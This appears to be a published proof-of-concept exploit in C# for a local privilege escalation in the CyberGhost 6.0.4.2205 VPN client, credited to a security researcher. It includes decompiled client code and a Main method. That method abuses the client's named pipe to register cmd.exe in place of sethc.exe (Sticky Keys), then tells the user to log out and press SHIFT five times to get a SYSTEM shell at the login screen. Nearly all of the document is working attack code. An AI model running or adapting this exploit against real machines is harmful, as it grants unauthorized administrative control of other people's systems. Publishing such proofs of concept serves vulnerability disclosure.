public static void StartProcessListAndDisableDebugger(List <ProcessStartInfo> aProcessList)
{
using (List <ProcessStartInfo> .Enumerator enumerator = aProcessList.GetEnumerator())
{
if (enumerator.MoveNext())
{
ProcessStartInfo current = enumerator.Current;
string fileName = Path.GetFileName(current.FileName);
current.UseShellExecute = false;
PeLauncherOptions peLauncherOptions = new PeLauncherOptions
{
ExecuteableName = fileName
};
ObjectHolder.CyberGhostCom.SetPeLauncherState(peLauncherOptions, 0);
try
{
Process.Start(current);
}
catch (Exception)
{
}
if (ProcessHelpers._reenableLauncherOperations == null)
{
ProcessHelpers._reenableLauncherOperations = new List <PeLauncherOptions>();
}
List <PeLauncherOptions> reenableLauncherOperations = ProcessHelpers._reenableLauncherOperations;
lock (reenableLauncherOperations)
{
ProcessHelpers._reenableLauncherOperations.Add(peLauncherOptions);
}
}
}
}
static void Main(string[] args)
{
Console.WriteLine("CyberGhost 6.0.4.2205 Privilege Escalation");
Console.WriteLine("by Kacper Szurek");
Console.WriteLine("http://security.szurek.pl/");
Console.WriteLine("https://twitter.com/KacperSzurek");
PeLauncherOptions options = new PeLauncherOptions();
options.ExecuteableName = "sethc.exe";
options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe";
EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe");
CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add);
Console.WriteLine("Now logout and then press SHIFT key 5 times");
}